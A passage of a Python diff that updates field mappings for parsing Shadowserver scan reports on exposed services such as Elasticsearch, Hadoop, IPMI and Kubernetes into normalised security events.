-        ('extra.', 'arch', validate_to_none),
-        ('extra.', 'key', validate_to_none),
+        ('extra.', 'name', validate_to_none),
+        ('extra.', 'cluster_name', validate_to_none),
+        ('extra.', 'build_hash', validate_to_none),
+        ('extra.', 'build_timestamp', validate_to_none),
+        ('extra.', 'lucene_version', validate_to_none),
+        ('extra.', 'tagline', validate_to_none),
+        ('extra.', 'sector', validate_to_none),
     ],
     'constant_fields': {
         'classification.taxonomy': 'vulnerable',
         'classification.type': 'vulnerable-system',
-        'classification.identifier': 'open-smb',
-        'protocol.transport': 'tcp',
-        'protocol.application': 'smb',
+        'protocol.application': 'elasticsearch',
+        'classification.identifier': 'open-elasticsearch',
     },
 }
 
-# https://www.shadowserver.org/wiki/pmwiki.php/Services/Open-LDAP
-open_ldap = {
+# https://www.shadowserver.org/what-we-do/network-reporting/accessible-erlang-port-mapper-report-daemon/
+scan_epmd = {
     'required_fields': [
         ('time.source', 'timestamp', add_UTC_to_timestamp),
-        ('source.ip', 'ip'),
-        ('source.port', 'port'),
+        ('source.ip', 'ip', validate_ip),
+        ('source.port', 'port', convert_int),
     ],
     'optional_fields': [
         ('protocol.transport', 'protocol'),
         ('source.reverse_dns', 'hostname'),
-        # ('classification.identifier', 'tag'),  # always set to 'open-ldap' in constant_fields
+        ('extra.', 'tag', validate_to_none),
         ('source.asn', 'asn', invalidate_zero),
         ('source.geolocation.cc', 'geo'),
         ('source.geolocation.region', 'region'),
         ('source.geolocation.city', 'city'),
-        ('extra.', 'naics', invalidate_zero),
-        ('extra.', 'sic', invalidate_zero),
-        ('extra.', 'size', convert_int),
-        ('extra.', 'configuration_naming_context', validate_to_none),
-        ('extra.', 'current_time', validate_to_none),
-        ('extra.', 'default_naming_context', validate_to_none),
-        ('source.local_hostname', 'dns_host_name'),
-        ('extra.', 'domain_controller_functionality', convert_int),
-        ('extra.', 'domain_functionality', convert_int),
-        ('extra.', 'ds_service_name', validate_to_none),
-        ('extra.', 'forest_functionality', convert_int),
-        ('extra.', 'highest_committed_usn', convert_int),
-        ('extra.', 'is_global_catalog_ready', convert_bool),
-        ('extra.', 'is_synchronized', convert_bool),
-        ('extra.', 'ldap_service_name', validate_to_none),
-        ('extra.', 'naming_contexts', validate_to_none),
-        ('extra.', 'root_domain_naming_context', validate_to_none),
-        ('extra.', 'schema_naming_context', validate_to_none),
-        ('extra.', 'server_name', validate_to_none),
-        ('extra.', 'subschema_subentry', validate_to_none),
-        ('extra.', 'supported_capabilities', validate_to_none),
-        ('extra.', 'supported_control', validate_to_none),
-        ('extra.', 'supported_ldap_policies', validate_to_none),
-        ('extra.', 'supported_ldap_version', validate_to_none),
-        ('extra.', 'supported_sasl_mechanisms', validate_to_none),
+        ('extra.source.naics', 'naics', invalidate_zero),
+        ('extra.source.sic', 'sic', invalidate_zero),
+        ('extra.source.sector', 'sector', validate_to_none),
+        ('extra.', 'nodes', validate_to_none),
     ],
     'constant_fields': {
-        'classification.taxonomy': 'vulnerable',
-        'classification.type': 'vulnerable-system',
-        'classification.identifier': 'open-ldap',
-        'protocol.application': 'ldap',
-    }
+        'classification.taxonomy': 'other',
+        'classification.type': 'other',
+        'protocol.application': 'Erlang Port Mapper Daemon',
+        'classification.identifier': 'open-epmd',
+    },
 }
 
-# https://www.shadowserver.org/what-we-do/network-reporting/blocklist-report/
-blocklist = {
+# https://www.shadowserver.org/what-we-do/network-reporting/vulnerable-exchange-server-report/
+scan_exchange = {
     'required_fields': [
         ('time.source', 'timestamp', add_UTC_to_timestamp),
+        ('source.ip', 'ip', validate_ip),
+        ('source.port', 'port', convert_int),
     ],
     'optional_fields': [
-        ('source.ip', 'ip', validate_ip),
-        ('source.network', 'ip', validate_network),
+        ('classification.taxonomy', 'tag', scan_exchange_taxonomy),
+        ('classification.type', 'tag', scan_exchange_type),
+        ('classification.identifier', 'tag', scan_exchange_identifier),
+        ('extra.', 'tag', validate_to_none),
         ('source.reverse_dns', 'hostname'),
-        ('extra.', 'source', validate_to_none),
-        ('extra.', 'reason', validate_to_none),
+        ('extra.', 'tag', validate_to_none),
         ('source.asn', 'asn', invalidate_zero),
         ('source.geolocation.cc', 'geo'),
         ('source.geolocation.region', 'region'),
         ('source.geolocation.city', 'city'),
-        ('extra.', 'naics', invalidate_zero),
-        ('extra.', 'sic', invalidate_zero),
-        ('extra.', 'sector', validate_to_none),
+        ('extra.source.naics', 'naics', invalidate_zero),
+        ('extra.source.sic', 'sic', invalidate_zero),
+        ('extra.source.sector', 'sector', validate_to_none),
+        ('extra.', 'version', validate_to_none),
+        ('extra.', 'servername', validate_to_none),
+        ('extra.', 'url', validate_to_none),
     ],
     'constant_fields': {
-        'classification.taxonomy': 'other',
-        'classification.type': 'blacklist',
-        'classification.identifier': 'blacklisted-ip',
-    }
+    },
 }
 
-# https://www.shadowserver.org/wiki/pmwiki.php/Services/Accessible-Telnet
-accessible_telnet = {
+# https://www.shadowserver.org/what-we-do/network-reporting/accessible-ftp-report/
+scan_ftp = {
     'required_fields': [
         ('time.source', 'timestamp', add_UTC_to_timestamp),
-        ('source.ip', 'ip'),
-        ('source.port', 'port'),
+        ('source.ip', 'ip', validate_ip),
+        ('source.port', 'port', convert_int),
     ],
     'optional_fields': [
         ('protocol.transport', 'protocol'),
         ('source.reverse_dns', 'hostname'),
-        # ('classification.identifier', 'tag'),  # always set to 'open-telnet' in constant_fields
+        ('extra.', 'tag', validate_to_none),
         ('source.asn', 'asn', invalidate_zero),
         ('source.geolocation.cc', 'geo'),
         ('source.geolocation.region', 'region'),
@@ -1656,510 +1690,731 @@ def force_base64(value: Optional[str]) -> Optional[str]:
         ('extra.', 'naics', invalidate_zero),
         ('extra.', 'sic', invalidate_zero),
         ('extra.', 'banner', validate_to_none),
+        ('extra.', 'handshake', validate_to_none),
+        ('extra.', 'cipher_suite', validate_to_none),
+        ('extra.', 'cert_length', convert_int),
+        ('extra.', 'subject_common_name', validate_to_none),
+        ('extra.', 'issuer_common_name', validate_to_none),
+        ('extra.', 'cert_issue_date', validate_to_none),
+        ('extra.', 'cert_expiration_date', validate_to_none),
+        ('extra.', 'sha1_fingerprint', validate_to_none),
+        ('extra.', 'cert_serial_number', validate_to_none),
+        ('extra.', 'ssl_version', convert_int),
+        ('extra.', 'signature_algorithm', validate_to_none),
+        ('extra.', 'key_algorithm', validate_to_none),
+        ('extra.', 'subject_organization_name', validate_to_none),
+        ('extra.', 'subject_organization_unit_name', validate_to_none),
+        ('extra.', 'subject_country', validate_to_none),
+        ('extra.', 'subject_state_or_province_name', validate_to_none),
+        ('extra.', 'subject_locality_name', validate_to_none),
+        ('extra.', 'subject_street_address', validate_to_none),
+        ('extra.', 'subject_postal_code', validate_to_none),
+        ('extra.', 'subject_surname', validate_to_none),
+        ('extra.', 'subject_given_name', validate_to_none),
+        ('extra.', 'subject_email_address', validate_to_none),
+        ('extra.', 'subject_business_category', validate_to_none),
+        ('extra.', 'subject_serial_number', validate_to_none),
+        ('extra.', 'issuer_organization_name', validate_to_none),
+        ('extra.', 'issuer_organization_unit_name', validate_to_none),
+        ('extra.', 'issuer_country', validate_to_none),
+        ('extra.', 'issuer_state_or_province_name', validate_to_none),
+        ('extra.', 'issuer_locality_name', validate_to_none),
+        ('extra.', 'issuer_street_address', validate_to_none),
+        ('extra.', 'issuer_postal_code', validate_to_none),
+        ('extra.', 'issuer_surname', validate_to_none),
+        ('extra.', 'issuer_given_name', validate_to_none),
+        ('extra.', 'issuer_email_address', validate_to_none),
+        ('extra.', 'issuer_business_category', validate_to_none),
+        ('extra.', 'issuer_serial_number', validate_to_none),
+        ('extra.', 'sha256_fingerprint', validate_to_none),
+        ('extra.', 'sha512_fingerprint', validate_to_none),
+        ('extra.', 'md5_fingerprint', validate_to_none),
+        ('extra.', 'cert_valid', convert_bool),
+        ('extra.', 'self_signed', convert_bool),
+        ('extra.', 'cert_expired', convert_bool),
+        ('extra.', 'validation_level', validate_to_none),
+        ('extra.', 'auth_tls_response', validate_to_none),
+        ('extra.', 'auth_ssl_response', validate_to_none),
+        ('extra.', 'tlsv13_support', validate_to_none),
+        ('extra.', 'tlsv13_cipher', validate_to_none),
+        ('extra.', 'jarm', validate_to_none),
+        ('extra.', 'device_vendor', validate_to_none),
+        ('extra.', 'device_type', validate_to_none),
+        ('extra.', 'device_model', validate_to_none),
+        ('extra.', 'device_version', validate_to_none),
+        ('extra.', 'device_sector', validate_to_none),
     ],
     'constant_fields': {
+        'classification.identifier': 'accessible-ftp',
         'classification.taxonomy': 'vulnerable',
         'classification.type': 'vulnerable-system',
-        'classification.identifier': 'open-telnet',
-        'protocol.application': 'telnet',
-    }
+        'protocol.application': 'ftp',
+    },
 }
 
-# https://www.shadowserver.org/wiki/pmwiki.php/Services/Open-CWMP
-accessible_cwmp = {
+# https://www.shadowserver.org/what-we-do/network-reporting/accessible-hadoop-report/
+scan_hadoop = {
     'required_fields': [
         ('time.source', 'timestamp', add_UTC_to_timestamp),
-        ('source.ip', 'ip'),
-        ('source.port', 'port'),
+        ('source.ip', 'ip', validate_ip),
+        ('source.port', 'port', convert_int),
     ],
     'optional_fields': [
-        ('protocol.transport', 'protocol'),
+        ('extra.', 'total_disk', convert_int),
+        ('extra.', 'used_disk', convert_int),
+        ('extra.', 'free_disk', convert_int),
         ('source.reverse_dns', 'hostname'),
-        # ('classification.identifier', 'tag'),  # always set to 'open-cwmp' in constant_fields
+        ('extra.', 'version', validate_to_none),
         ('source.asn', 'asn', invalidate_zero),
         ('source.geolocation.cc', 'geo'),
         ('source.geolocation.region', 'region'),
         ('source.geolocation.city', 'city'),
         ('extra.', 'naics', invalidate_zero),
         ('extra.', 'sic', invalidate_zero),
-        ('extra.', 'http', validate_to_none),
-        ('extra.', 'http_code', convert_int),
-        ('extra.', 'http_reason', validate_to_none),
-        ('extra.', 'content_type', validate_to_none),
-        ('extra.', 'connection', validate_to_none),
-        ('extra.', 'www_authenticate', validate_to_none),
-        ('extra.', 'set_cookie', validate_to_none),
-        ('extra.', 'server', validate_to_none),
-        ('extra.', 'content_length', convert_int),
-        ('extra.', 'transfer_encoding', validate_to_none),
-        ('extra.', 'date', validate_to_none),
+        ('extra.', 'server_type', validate_to_none),
+        ('extra.', 'clusterid', validate_to_none),
+        ('extra.', 'livenodes', validate_to_none),
+        ('extra.', 'namenodeaddress', validate_to_none),
+        ('extra.', 'volumeinfo', validate_to_none),
     ],
     'constant_fields': {
+        'classification.identifier': 'accessible-hadoop',
         'classification.taxonomy': 'vulnerable',
         'classification.type': 'vulnerable-system',
-        'classification.identifier': 'open-cwmp',
-        'protocol.application': 'cwmp',
-    }
+        'protocol.application': 'hadoop',
+        'protocol.transport': 'tcp',
+    },
 }
 
-# https://www.shadowserver.org/wiki/pmwiki.php/Services/Accessible-VNC
-accessible_vnc = {
+# https://www.shadowserver.org/what-we-do/network-reporting/accessible-http-report/
+scan_http = {
     'required_fields': [
         ('time.source', 'timestamp', add_UTC_to_timestamp),
-        ('source.ip', 'ip'),
-        ('source.port', 'port'),
+        ('source.ip', 'ip', validate_ip),
+        ('source.port', 'port', convert_int),
     ],
     'optional_fields': [
+        ('protocol.transport', 'protocol'),
         ('source.reverse_dns', 'hostname'),
+        ('extra.', 'tag', validate_to_none),
         ('source.asn', 'asn', invalidate_zero),
         ('source.geolocation.cc', 'geo'),
         ('source.geolocation.region', 'region'),
         ('source.geolocation.city', 'city'),
-        ('extra.', 'naics', invalidate_zero),
-        ('extra.', 'sic', invalidate_zero),
-        ('extra.', 'product', validate_to_none),
-        ('extra.', 'banner', validate_to_none),
+        ('extra.source.naics', 'naics', invalidate_zero),
+        ('extra.source.sic', 'sic', invalidate_zero),
+        ('extra.', 'http', validate_to_none),
+        ('extra.', 'http_code', convert_int),
+        ('extra.', 'http_reason', validate_to_none),
+        ('extra.', 'content_type', validate_to_none),
+        ('extra.', 'connection', validate_to_none),
+        ('extra.', 'www_authenticate', validate_to_none),
+        ('extra.', 'set_cookie', validate_to_none),
+        ('extra.', 'server', validate_to_none),
+        ('extra.', 'content_length', convert_int),
+        ('extra.', 'transfer_encoding', validate_to_none),
+        ('extra.', 'http_date', convert_date),
     ],
     'constant_fields': {
-        'classification.taxonomy': 'vulnerable',
-        'classification.type': 'vulnerable-system',
-        'classification.identifier': 'open-vnc',
-        'protocol.transport': 'tcp',
-        'protocol.application': 'vnc',
-    }
+        'classification.taxonomy': 'other',
+        'classification.type': 'other',
+        'protocol.application': 'http',
+        'classification.identifier': 'open-http',
+    },
 }
 
-# https://www.shadowserver.org/wiki/pmwiki.php/Services/Accessible-CiscoSmartInstall
-accessible_cisco_smart_install = {
+# https://www.shadowserver.org/what-we-do/network-reporting/vulnerable-http-report/
+scan_http_vulnerable = {
     'required_fields': [
         ('time.source', 'timestamp', add_UTC_to_timestamp),
-        ('source.ip', 'ip'),
-        ('source.port', 'port'),
+        ('source.ip', 'ip', validate_ip),
+        ('source.port', 'port', convert_int),
     ],
     'optional_fields': [
         ('protocol.transport', 'protocol'),
         ('source.reverse_dns', 'hostname'),
-        # ('classification.identifier', 'tag'),  # always set to 'accessible-cisco-smart-install' in constant_fields
+        ('extra.', 'tag', validate_to_none),
         ('source.asn', 'asn', invalidate_zero),
         ('source.geolocation.cc', 'geo'),
         ('source.geolocation.region', 'region'),
         ('source.geolocation.city', 'city'),
         ('extra.', 'naics', invalidate_zero),
         ('extra.', 'sic', invalidate_zero),
+        ('extra.', 'http', validate_to_none),
+        ('extra.', 'http_code', convert_int),
+        ('extra.', 'http_reason', validate_to_none),
+        ('extra.', 'content_type', validate_to_none),
+        ('extra.', 'connection', validate_to_none),
+        ('extra.', 'www_authenticate', validate_to_none),
+        ('extra.', 'set_cookie', validate_to_none),
+        ('extra.', 'server', validate_to_none),
+        ('extra.', 'content_length', convert_int),
+        ('extra.', 'transfer_encoding', validate_to_none),
+        ('extra.', 'http_date', convert_date),
     ],
     'constant_fields': {
+        'classification.identifier': 'accessible-http',
         'classification.taxonomy': 'vulnerable',
         'classification.type': 'vulnerable-system',
-        'classification.identifier': 'accessible-cisco-smart-install',
-        'protocol.application': 'cisco-smart-install',
-    }
+        'protocol.application': 'http',
+    },
 }
 
-# https://www.shadowserver.org/wiki/pmwiki.php/Services/Drone-BruteForce
-# legacy (replaced by honeypot_brute_force)
-drone_brute_force = {
+# https://www.shadowserver.org/what-we-do/network-reporting/accessible-ics-report/
+scan_ics = {
     'required_fields': [
         ('time.source', 'timestamp', add_UTC_to_timestamp),
-        ('source.ip', 'ip'),
-        ('source.port', 'port'),
+        ('source.ip', 'ip', validate_ip),
+        ('source.port', 'port', convert_int),
     ],
     'optional_fields': [
+        ('protocol.application', 'tag'),
+        ('protocol.transport', 'protocol'),
+        ('source.reverse_dns', 'hostname'),
         ('source.asn', 'asn', invalidate_zero),
         ('source.geolocation.cc', 'geo'),
         ('source.geolocation.region', 'region'),
         ('source.geolocation.city', 'city'),
-        ('source.reverse_dns', 'hostname'),
-        ('destination.ip', 'dest_ip', validate_ip),
-        ('destination.port', 'dest_port'),
-        ('destination.asn', 'dest_asn', invalidate_zero),
-        ('destination.geolocation.cc', 'dest_geo'),
-        ('destination.fqdn', 'dest_dns'),
-        ('protocol.application', 'service'),
-        ('classification.identifier', 'service'),
-        ('extra.', 'naics', invalidate_zero),
-        ('extra.', 'sic', invalidate_zero),
-        ('extra.destination.naics', 'dest_naics', invalidate_zero),
-        ('extra.destination.sic', 'dest_sic', invalidate_zero),
-        ('extra.', 'sector', validate_to_none),
-        ('extra.destination.sector', 'dest_sector', validate_to_none),
-        ('extra.', 'public_source', validate_to_none),
-        ('extra.', 'start_time', validate_to_none),
-        ('extra.', 'end_time', convert_date_utc),
-        ('extra.', 'client_version', validate_to_none),
-        ('destination.account', 'username', validate_to_none),
-        ('extra.', 'password', validate_to_none),
-        ('extra.', 'payload_url', validate_to_none),
-        ('extra.', 'payload_md5', validate_to_none),
+        ('extra.source.naics', 'naics', invalidate_zero),
+        ('extra.source.sic', 'sic', invalidate_zero),
+        ('extra.source.sector', 'sector', validate_to_none),
+        ('extra.', 'device_vendor', validate_to_none),
+        ('extra.', 'device_type', validate_to_none),
+        ('extra.', 'device_model', validate_to_none),
+        ('extra.', 'device_version', validate_to_none),
+        ('extra.', 'device_id', validate_to_none),
+        ('extra.', 'response_length', convert_int),
+        ('extra.', 'raw_response', validate_to_none),
     ],
     'constant_fields': {
-        'classification.taxonomy': 'intrusion-attempts',
-        'classification.type': 'brute-force',
-    }
+        'classification.taxonomy': 'vulnerable',
+        'classification.type': 'vulnerable-system',
+        'classification.identifier': 'open-ics',
+    },
 }
 
-# https://www.shadowserver.org/wiki/pmwiki.php/Services/Accessible-Hadoop
-accessible_hadoop = {
+# https://www.shadowserver.org/what-we-do/network-reporting/open-ipmi-report/
+scan_ipmi = {
     'required_fields': [
         ('time.source', 'timestamp', add_UTC_to_timestamp),
-        ('source.ip', 'ip'),
-        ('source.port', 'port'),
+        ('source.ip', 'ip', validate_ip),
+        ('source.port', 'port', convert_int),
     ],
     'optional_fields': [
+        ('extra.', 'none_auth', convert_bool),
+        ('extra.', 'md2_auth', convert_bool),
+        ('extra.', 'md5_auth', convert_bool),
+        ('extra.', 'passkey_auth', convert_bool),
+        ('extra.', 'oem_auth', convert_bool),
+        ('extra.', 'permessage_auth', convert_bool),
+        ('extra.', 'userlevel_auth', convert_bool),
+        ('extra.', 'usernames', convert_bool),
+        ('extra.', 'nulluser', convert_bool),
+        ('extra.', 'anon_login', convert_bool),
         ('source.reverse_dns', 'hostname'),
+        ('extra.', 'tag', validate_to_none),
+        ('extra.', 'ipmi_version', validate_to_none),
         ('source.asn', 'asn', invalidate_zero),
         ('source.geolocation.cc', 'geo'),
         ('source.geolocation.region', 'region'),
         ('source.geolocation.city', 'city'),
-        ('extra.', 'naics', invalidate_zero),
-        ('extra.', 'sic', invalidate_zero),
+        ('extra.', 'defaultkg', validate_to_none),
+        ('extra.', 'error', validate_to_none),
+        ('extra.', 'deviceid', validate_to_none),
+        ('extra.', 'devicerev', validate_to_none),
+        ('extra.', 'firmwarerev', validate_to_none),
         ('extra.', 'version', validate_to_none),
-        ('extra.', 'server_type', validate_to_none),
-        ('extra.', 'clusterid', validate_to_none),
-        ('extra.', 'total_disk', invalidate_zero),
-        ('extra.', 'used_disk', invalidate_zero),
-        ('extra.', 'free_disk', invalidate_zero),
-        ('extra.', 'livenodes', validate_to_none),
-        ('extra.', 'namenodeaddress', validate_to_none),
-        ('extra.', 'volumeinfo', validate_to_none),
+        ('extra.', 'manufacturerid', validate_to_none),
+        ('extra.', 'manufacturername', validate_to_none),
+        ('extra.', 'productid', validate_to_none),
+        ('extra.', 'productname', validate_to_none),
+        ('extra.source.naics', 'naics', invalidate_zero),
+        ('extra.source.sic', 'sic', invalidate_zero),
+        ('extra.source.sector', 'sector', validate_to_none),
     ],
     'constant_fields': {
-        'protocol.application': 'hadoop',
-        'protocol.transport': 'tcp',
         'classification.taxonomy': 'vulnerable',
         'classification.type': 'vulnerable-system',
-        'classification.identifier': 'accessible-hadoop',
-    }
+        'protocol.application': 'ipmi',
+        'protocol.transport': 'udp',
+        'classification.identifier': 'open-ipmi',
+    },
 }
 
-# https://www.shadowserver.org/wiki/pmwiki.php/Services/Accessible-ADB
-accessible_adb = {
+# https://www.shadowserver.org/what-we-do/network-reporting/open-ipp-report/
+scan_ipp = {
     'required_fields': [
         ('time.source', 'timestamp', add_UTC_to_timestamp),
-        ('source.ip', 'ip'),
-        ('source.port', 'port'),
+        ('source.ip', 'ip', validate_ip),
+        ('source.port', 'port', convert_int),
     ],
     'optional_fields': [
         ('protocol.transport', 'protocol'),
         ('source.reverse_dns', 'hostname'),
-        # ('classification.identifier', 'tag'),  # always set to 'accessible-adb' in constant_fields
+        ('extra.', 'tag', validate_to_none),
         ('source.asn', 'asn', invalidate_zero),
         ('source.geolocation.cc', 'geo'),
         ('source.geolocation.region', 'region'),
         ('source.geolocation.city', 'city'),
         ('extra.', 'naics', invalidate_zero),
         ('extra.', 'sic', invalidate_zero),
-        ('extra.', 'name', validate_to_none),
-        ('extra.', 'model', validate_to_none),
-        ('extra.', 'device', validate_to_none),
-        ('extra.', 'features', validate_to_none),
+        ('extra.', 'ipp_version', validate_to_none),
+        ('extra.', 'cups_version', validate_to_none),
+        ('extra.', 'printer_uris', validate_to_none),
+        ('extra.', 'printer_name', validate_to_none),
+        ('extra.', 'printer_info', validate_to_none),
+        ('extra.', 'printer_more_info', validate_to_none),
+        ('extra.', 'printer_make_and_model', validate_to_none),
+        ('extra.', 'printer_firmware_name', validate_to_none),
+        ('extra.', 'printer_firmware_string_version', validate_to_none),
+        ('extra.', 'printer_firmware_version', validate_to_none),
+        ('extra.', 'printer_organization', validate_to_none),
+        ('extra.', 'printer_organization_unit', validate_to_none),
+        ('extra.', 'printer_uuid', validate_to_none),
+        ('extra.', 'printer_wifi_ssid', validate_to_none),
+        ('extra.', 'device_vendor', validate_to_none),
+        ('extra.', 'device_type', validate_to_none),
+        ('extra.', 'device_model', validate_to_none),
+        ('extra.', 'device_version', validate_to_none),
+        ('extra.', 'device_sector', validate_to_none),
     ],
     'constant_fields': {
         'classification.taxonomy': 'vulnerable',
         'classification.type': 'vulnerable-system',
-        'classification.identifier': 'accessible-adb',
-        'protocol.application': 'adb',
+        'protocol.application': 'ipp',
+        'classification.identifier': 'open-ipp',
     },
 }
 
-# https://www.shadowserver.org/wiki/pmwiki.php/Services/Outdated-DNSSEC-Key
-# https://www.shadowserver.org/wiki/pmwiki.php/Services/Outdated-DNSSEC-Key-IPv6
-outdated_dnssec_key = {
+# https://www.shadowserver.org/what-we-do/network-reporting/vulnerable-isakmp-report/
+scan_isakmp = {
     'required_fields': [
         ('time.source', 'timestamp', add_UTC_to_timestamp),
-        ('source.ip', 'ip'),
+        ('source.ip', 'ip', validate_ip),
+        ('source.port', 'port', convert_int),
     ],
     'optional_fields': [
+        ('extra.', 'spi_size', convert_int),
+        ('protocol.transport', 'protocol'),
+        ('source.reverse_dns', 'hostname'),
+        ('extra.', 'tag', validate_to_none),
         ('source.asn', 'asn', invalidate_zero),
         ('source.geolocation.cc', 'geo'),
         ('source.geolocation.region', 'region'),
         ('source.geolocation.city', 'city'),
-        ('source.reverse_dns', 'hostname'),
-        ('destination.ip', 'dst_ip', validate_ip),
-        ('destination.port', 'dst_port', convert_int),
-        ('destination.asn', 'dst_asn', invalidate_zero),
-        ('destination.geolocation.cc', 'dst_geo'),
         ('extra.', 'naics', invalidate_zero),
         ('extra.', 'sic', invalidate_zero),
-        ('extra.destination.naics', 'dst_naics', invalidate_zero),
-        ('extra.destination.sic', 'dst_sic', invalidate_zero),
-        ('extra.', 'sector', validate_to_none),
-        ('extra.destination.sector', 'dst_sector', validate_to_none),
-        # ('classification.identifier', 'tag'),  # always set to 'outdated-dnssec-key' in constant_fields
-        ('extra.', 'public_source', validate_to_none),
-        ('protocol.transport', 'protocol'),
+        ('extra.', 'initiator_spi', validate_to_none),
+        ('extra.', 'responder_spi', validate_to_none),
+        ('extra.', 'next_payload', validate_to_none),
+        ('extra.', 'exchange_type', validate_to_none),
+        ('extra.', 'flags', validate_to_none),
+        ('extra.', 'message_id', validate_to_none),
+        ('extra.', 'next_payload2', validate_to_none),
+        ('extra.', 'domain_of_interpretation', validate_to_none),
+        ('extra.', 'protocol_id', validate_to_none),
+        ('extra.', 'notify_message_type', validate_to_none),
     ],
     'constant_fields': {
-        'protocol.application': 'dns',
-        'classification.taxonomy': 'availability',
-        'classification.type': 'other',  # change to "misconfiguration" when available
-        'classification.identifier': 'outdated-dnssec-key',
-    }
+        'classification.identifier': 'open-ike',
+        'classification.taxonomy': 'vulnerable',
+        'classification.type': 'vulnerable-system',
+        'protocol.application': 'ipsec',
+    },
 }
 
-# https://www.shadowserver.org/wiki/pmwiki.php/Services/Accessible-rsync
-accessible_rsync = {
+# https://www.shadowserver.org/what-we-do/network-reporting/accessible-kubernetes-api-server-report/
+scan_kubernetes = {
     'required_fields': [
         ('time.source', 'timestamp', add_UTC_to_timestamp),
-        ('source.ip', 'ip'),
-        ('source.port', 'port'),
+        ('source.ip', 'ip', validate_ip),
+        ('source.port', 'port', convert_int),
     ],
     'optional_fields': [
         ('protocol.transport', 'protocol'),
         ('source.reverse_dns', 'hostname'),
-        # ('classification.identifier', 'tag'),  # always set to 'accessible-rsync' in constant_fields
+        ('extra.', 'tag', validate_to_none),
+        ('extra.', 'version', validate_to_none),
         ('source.asn', 'asn', invalidate_zero),
         ('source.geolocation.cc', 'geo'),
         ('source.geolocation.region', 'region'),
         ('source.geolocation.city', 'city'),
-        ('extra.', 'naics', invalidate_zero),
-        ('extra.', 'sic', invalidate_zero),
-        ('extra.', 'module', validate_to_none),
-        ('extra.', 'motd', validate_to_none),
-        ('extra.', 'password', convert_bool),
+        ('extra.source.naics', 'naics', invalidate_zero),
+        ('extra.source.sic', 'sic', invalidate_zero),
+        ('extra.source.sector', 'sector', validate_to_none),
+        ('extra.', 'http', validate_to_none),
+        ('extra.', 'http_code', convert_int),
+        ('extra.', 'http_reason', validate_to_none),
+        ('extra.', 'content_type', validate_to_none),
+        ('extra.', 'server', validate_to_none),
+        ('extra.', 'date', validate_to_none),
+        ('extra.', 'major', validate_to_none),
+        ('extra.', 'minor', validate_to_none),
+        ('extra.', 'git_version', validate_to_none),
+        ('extra.', 'git_commit', validate_to_none),
+        ('extra.', 'git_tree_state', validate_to_none),
+        ('extra.', 'build_date', validate_to_none),
+        ('extra.', 'go_version', validate_to_none),
+        ('extra.', 'compiler', validate_to_none),
+        ('extra.', 'platform', validate_to_none),
+        ('extra.', 'handshake', validate_to_none),
+        ('extra.', 'cipher_suite', validate_to_none),
+        ('extra.', 'cert_length', convert_int),
+        ('extra.', 'subject_common_name', validate_to_none),
+        ('extra.', 'issuer_common_name', validate_to_none),
+        ('extra.', 'cert_issue_date', validate_to_none),
+        ('extra.', 'cert_expiration_date', validate_to_none),
+        ('extra.', 'sha1_fingerprint', validate_to_none),
+        ('extra.', 'cert_serial_number', validate_to_none),
+        ('extra.', 'ssl_version', convert_int),
+        ('extra.', 'signature_algorithm', validate_to_none),
+        ('extra.', 'key_algorithm', validate_to_none),
+        ('extra.', 'subject_organization_name', validate_to_none),
+        ('extra.', 'subject_organization_unit_name', validate_to_none),
+        ('extra.', 'subject_country', validate_to_none),
+        ('extra.', 'subject_state_or_province_name', validate_to_none),
+        ('extra.', 'subject_locality_name', validate_to_none),
+        ('extra.', 'subject_street_address', validate_to_none),
+        ('extra.', 'subject_postal_code', validate_to_none),
+        ('extra.', 'subject_surname', validate_to_none),
+        ('extra.', 'subject_given_name', validate_to_none),
+        ('extra.', 'subject_email_address', validate_to_none),
+        ('extra.', 'subject_business_category', validate_to_none),
+        ('extra.', 'subject_serial_number', validate_to_none),
+        ('extra.', 'issuer_organization_name', validate_to_none),
+        ('extra.', 'issuer_organization_unit_name', validate_to_none),
+        ('extra.', 'issuer_country', validate_to_none),
+        ('extra.', 'issuer_state_or_province_name', validate_to_none),
+        ('extra.', 'issuer_locality_name', validate_to_none),
+        ('extra.', 'issuer_street_address', validate_to_none),
+        ('extra.', 'issuer_postal_code', validate_to_none),
+        ('extra.', 'issuer_surname', validate_to_none),
+        ('extra.', 'issuer_given_name', validate_to_none),
+        ('extra.', 'issuer_email_address', validate_to_none),
+        ('extra.', 'issuer_business_category', validate_to_none),
+        ('extra.', 'issuer_serial_number', validate_to_none),
+        ('extra.', 'sha256_fingerprint', validate_to_none),
+        ('extra.', 'sha512_fingerprint', validate_to_none),
+        ('extra.', 'md5_fingerprint', validate_to_none),
+        ('extra.', 'cert_valid', convert_bool),
+        ('extra.', 'self_signed', convert_bool),
+        ('extra.', 'cert_expired', convert_bool),
+        ('extra.', 'validation_level', validate_to_none),
+        ('extra.', 'browser_trusted', validate_to_none),
+        ('extra.', 'browser_error', validate_to_none),
+        ('extra.', 'raw_cert', validate_to_none),
+        ('extra.', 'raw_cert_chain', validate_to_none),
     ],
     'constant_fields': {
         'classification.taxonomy': 'vulnerable',
         'classification.type': 'vulnerable-system',
-        'classification.identifier': 'accessible-rsync',
-        'protocol.application': 'rsync',
+        'protocol.application': 'kubernetes',
+        'classification.identifier': 'open-kubernetes',
     },
 }
 
-# https://www.shadowserver.org/wiki/pmwiki.php/Services/Accessible-AFP
-accessible_afp = {
+# https://www.shadowserver.org/what-we-do/network-reporting/open-ldap-tcp-report/
+scan_ldap_tcp = {
     'required_fields': [
         ('time.source', 'timestamp', add_UTC_to_timestamp),
-        ('source.ip', 'ip'),
-        ('source.port', 'port'),
+        ('source.ip', 'ip', validate_ip),
+        ('source.port', 'port', convert_int),
     ],
     'optional_fields': [
+        ('source.local_hostname', 'dns_host_name', validate_to_none),
+        ('extra.', 'domain_controller_functionality', convert_int),
+        ('extra.', 'domain_functionality', convert_int),
+        ('extra.', 'forest_functionality', convert_int),
+        ('extra.', 'highest_committed_usn', convert_int),
+        ('extra.', 'is_global_catalog_ready', convert_bool),
+        ('extra.', 'is_synchronized', convert_bool),
         ('protocol.transport', 'protocol'),
         ('source.reverse_dns', 'hostname'),
-        # ('classification.identifier', 'tag'),  # always set to 'accessible-afp' in constant_fields
+        ('extra.', 'tag', validate_to_none),
         ('source.asn', 'asn', invalidate_zero),
         ('source.geolocation.cc', 'geo'),
         ('source.geolocation.region', 'region'),
         ('source.geolocation.city', 'city'),
         ('extra.', 'naics', invalidate_zero),
         ('extra.', 'sic', invalidate_zero),
-        ('extra.', 'machine_type', validate_to_none),
-        ('extra.', 'afp_versions', validate_to_none),
-        ('extra.', 'uams', validate_to_none),
-        ('extra.', 'flags', validate_to_none),
+        ('extra.', 'size', convert_int),
